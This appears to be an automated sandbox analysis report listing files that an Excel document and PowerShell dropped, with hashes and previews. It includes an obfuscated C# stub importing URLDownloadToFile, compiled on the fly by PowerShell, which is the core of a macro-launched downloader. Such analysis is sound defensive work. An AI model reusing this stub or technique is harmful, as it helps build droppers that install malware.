                                                                                              Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP................1..9.=wV.MuJ.j.w..........4.......C:\Users\user\AppData\Local\Temp\RES955D.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.d.4.q.m.p.a.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                              C:\Users\user\AppData\Local\Temp\RESD71D.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 06:39:58 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):3.9920214704746377
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:Hg6e9Eur1aCEdH1wKdNWI+ycuZhNYakSUPNnqSqd:4rO2Kd41ulYa30qSK
                                                                                              MD5:4CD5D345060CC4203EEFE4759E988E8C
                                                                                              SHA1:FE0E77ECD78D4A73D7298E36A6879CA6BFB2BBD9
                                                                                              SHA-256:6C4A8676B0C9F258CB3210C9BCC1BA27595F2AE68B1EA3AE1165C270C516F46C
                                                                                              SHA-512:76C7E7B84270161848786F475BB3218556484FD771AC6C25BE4EB67C7F2FFC0D1CB1AF554390E68FEF03499A6FD38AF9524518372517DFBAE80589296B1CFD47
                                                                                              Malicious:false
                                                                                              Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP.................. .#8./.z..(.............4.......C:\Users\user\AppData\Local\Temp\RESD71D.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.a.n.s.5.0.4.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                              C:\Users\user\AppData\Local\Temp\c2ahhgih.fsw.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\gb5uszx1.mnv.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\h0rlyech.ht1.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\hycyqs4u.z1w.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\j1mxbawn.kmk.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\jsnmpiob.0rn.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\kexpyvfy.qri.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.0869623652509373
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWak7YnqqUPN5Dlq5J:+RI+ycuZhNYakSUPNnqX
                                                                                              MD5:98C0207F2338112F947AAEBA280EFDC6
                                                                                              SHA1:012F3F91D2AF85B64BC70330F1C42338123FB6EC
                                                                                              SHA-256:7441AC3E9423B7B72FF9CC8F820F4869560EA6B5CE5E55DC1D1416AAC64F93C1
                                                                                              SHA-512:6EA247C6DBA5AFA4A119792871F84E4967E4F57EE3B44AF3846E139A2B1B897607F866E17E5120998DDEFAEDFA68BB379CEFF22B21CC80532AC101ADA6757B8C
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.a.n.s.5.0.4.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.a.n.s.5.0.4.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                              C:\Users\user\AppData\Local\Temp\mans504x\mans504x.0.cs

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (339)
                                                                                              Category:dropped
                                                                                              Size (bytes):448
                                                                                              Entropy (8bit):3.602368401674701
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:V/DsYLDS81zumcMGpJ/RQXReKJ8SRHy4HlQmVxNry:V/DTLDfuh8XfH/Ry
                                                                                              MD5:9C039B5963614D123333DA08E67495E2
                                                                                              SHA1:6B23C25A297DE997CBA7C4A34BBA17790F022004
                                                                                              SHA-256:B5BB2A1A865DFEEA658FD32146C6B8607AD2BA583FEEDB67D16E49BB0B323073
                                                                                              SHA-512:BD63BE7A8E58CBC0FCE553362B83A725B5F78108C7E5861BBD7AE9496AF71CC454CE220D1FE447EECAFF9B03EACF6A24B268C2660D47A6CFE372579EB03CB904
                                                                                              Malicious:false
                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace ZXa.{. public class bq. {. [DllImport("urlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr XtrbHs,string nlcr,string Gyvr,uint u,IntPtr A);.. }..}.

                                                                                              C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):369
                                                                                              Entropy (8bit):5.229305465016943
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23ftp70zxs7+AEszIP23ftpV:p37Lvkmb6Kz1p70WZEo1pV
                                                                                              MD5:1E1AC3E3F12F98E466F35B2E557EF072
                                                                                              SHA1:D21B3D033E6EC7557CBC5272458CB633BB211676
                                                                                              SHA-256:AAFA87F4AA888AE60EF22211D94FC49502DC51912270D8DCF784F956FE332B26
                                                                                              SHA-512:9E18499DDD7013BE1D8CE7A43CB8535EE8DF40C4AB8126ABE0B6383A8F9FBAB61418E191812592E19E5BFA3614516C000485134BE3867ED429FFC2525531A4CA
                                                                                              Malicious:false
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mans504x\mans504x.0.cs"

                                                                                              C:\Users\user\AppData\Local\Temp\mans504x\mans504x.dll

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):3072
                                                                                              Entropy (8bit):2.7612254692225293
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:etGSTJ+Jyl8scigkVrVltzztkZfm9P0zCuWI+ycuZhNYakSUPNnqI:6EA+83VjuJm9P0OV1ulYa30qI
                                                                                              MD5:91B201D15FCC9CAF993FA30CADA9CE57
                                                                                              SHA1:3B6C4022D9BD12E4AC11A0E108474EDA97B08F96
                                                                                              SHA-256:C6FF7EF2D793C2A73A598ADC6DEAED3204847D593FE59942AF0C1EDA86B66A65
                                                                                              SHA-512:FAEFDEFFDC4DBC663FEAE900CCD912CD3524DC060DFDDFBCEEC6C4B7ECD16382CA07B8B6A1833A08806CCACC478A01F8CA9D43B5E8B8ECE5D91EF8ECA951D01A
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................D#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3..............................................................'.....b.....b.......................................... 5.....P ......G.........M.....T.....Y.....^.....`...G.....G...!.G.....G.......!.....*.......5..................................................<Module>.ma

                                                                                              C:\Users\user\AppData\Local\Temp\mans504x\mans504x.out

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):866
                                                                                              Entropy (8bit):5.336000720421524
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:AId3ka6Kz1pVEo1SKaMD5DqBVKVrdFAMBJTH:Akka603VEokKdDcVKdBJj
                                                                                              MD5:F0F6A67D93D51EEB792EA3ED3B45D59C
                                                                                              SHA1:661D9B1869238AF44C914A1F5FD2E9F55E618500
                                                                                              SHA-256:CC388B285546D488FA39F67B213F2908CFB5776CB815388CA69F1A61B6373A1E
                                                                                              SHA-512:B1A98B09F0FED0EE27BD79837B108575E4B84D99F7D4F8DAC6A9808C3A28229193B7D26E79BD3F64C6C3EF8503ACF9BF9824041EC24A73C0489109251C82A393
                                                                                              Malicious:false
                                                                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mans504x\mans504x.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                              C:\Users\user\AppData\Local\Temp\npsxzaxq.rnv.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.0957038359582962
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWRak7Ynqq1WPN5Dlq5J:+RI+ycuZhNsRakS1WPNnqX
                                                                                              MD5:312EB239E23D7756B34D754AD76AC277
                                                                                              SHA1:D377404B0F026E82CB1066758B75999F2F0959BE
                                                                                              SHA-256:745694638D3D96C9941B43794BCBD93421307D9E99F52009E43F2BF1AE50E49B
                                                                                              SHA-512:537A4413FE05852731A3C5C82B3B7D2F29662A2BDF252CC40048F2736436B11ECA4FDEFD8B6A9F8DADBAA28C0C9DF96CFA3011E7FECCBE597EAF9EE04876E510
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.d.4.q.m.p.a.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.d.4.q.m.p.a.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                              C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.0.cs

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (339)
                                                                                              Category:dropped
                                                                                              Size (bytes):448
                                                                                              Entropy (8bit):3.602368401674701
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:V/DsYLDS81zumcMGpJ/RQXReKJ8SRHy4HlQmVxNry:V/DTLDfuh8XfH/Ry
                                                                                              MD5:9C039B5963614D123333DA08E67495E2
                                                                                              SHA1:6B23C25A297DE997CBA7C4A34BBA17790F022004
                                                                                              SHA-256:B5BB2A1A865DFEEA658FD32146C6B8607AD2BA583FEEDB67D16E49BB0B323073
                                                                                              SHA-512:BD63BE7A8E58CBC0FCE553362B83A725B5F78108C7E5861BBD7AE9496AF71CC454CE220D1FE447EECAFF9B03EACF6A24B268C2660D47A6CFE372579EB03CB904
                                                                                              Malicious:false
                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace ZXa.{. public class bq. {. [DllImport("urlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr XtrbHs,string nlcr,string Gyvr,uint u,IntPtr A);.. }..}.

                                                                                              C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):369
                                                                                              Entropy (8bit):5.213183995937804
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f7bUzxs7+AEszIP23f7Tx:p37Lvkmb6KzTYWZEoTV
                                                                                              MD5:736DA6439D49D9FF1383CEFF5930F4D0
                                                                                              SHA1:335E6014278200F53399C127381FA5E4EDB15B01
                                                                                              SHA-256:CD511F16390C0C78C0D4ADECD6F3F538549875ACFEED5A59FFDB4A6EBD6D81FF
                                                                                              SHA-512:1AFC435A2668E48145488758CB13092F9B125FFB64CBE8059C79CB6500B0EC686547BEFD7DAD393A64B6D53D2C6C8C70AC67AB1EFC7F763D0A4427750EED4295
                                                                                              Malicious:true
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.0.cs"

                                                                                              C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.dll

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):3072
                                                                                              Entropy (8bit):2.7606967150310195
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:etGSuJ+Jyl8scigkVrntzztkZfLm9ZvzCuWI+ycuZhNsRakS1WPNnqI:6tA+83tuJLm9ZOV1ulsRa31qqI
                                                                                              MD5:03461E4A086B6E264454F66F2699AF08
                                                                                              SHA1:E15E29F4E095E87FD45F8B4E3FA40E6A41F49DDA
                                                                                              SHA-256:FCC526F89382848760F3413317191CB27F62F1B32068213C30E76F1180F89D11
                                                                                              SHA-512:134DC390718AFCF9EC03A62E16C77D04641D417034EE0D1A094E04099236981BE89AF2503959C85BC9312F4E8C5C7C3EF8253B6EAC61CF19BCD266ED5BA3081D
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................D#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3..............................................................'.....b.....b.......................................... 5.....P ......G.........M.....T.....Y.....^.....`...G.....G...!.G.....G.......!.....*.......5..................................................<Module>.td

                                                                                              C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.out

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):866
                                                                                              Entropy (8bit):5.3400148668279055
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:AId3ka6Kz1Eo0KaMD5DqBVKVrdFAMBJTH:Akka601Eo0KdDcVKdBJj
                                                                                              MD5:E333A81325AED2EE9D80B1B2CD783AAA
                                                                                              SHA1:4039C0284E2FDA288968F9AE4DB5296456ACB03A
                                                                                              SHA-256:822BA9A49C5D9732A70324D683B9238ADC53F087EF2612862774321EEEBFD9FD
                                                                                              SHA-512:1E09B0536EE5B472E061605A7477DD1026DF9E64FE67C3D4F95C08A85011F9A3E537AB728CCC837C10934EEC29A63DCBA0E3DFFB440B3FFB36134CC6CCEFF931
                                                                                              Malicious:false
                                                                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                              C:\Users\user\AppData\Local\Temp\vwc5d2mi.3lc.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\zyva5ojw.sju.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\~DF549F7AD023B19E00.TMP

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\~DFE533ACD5D4E706AA.TMP

                                                                                              Download File
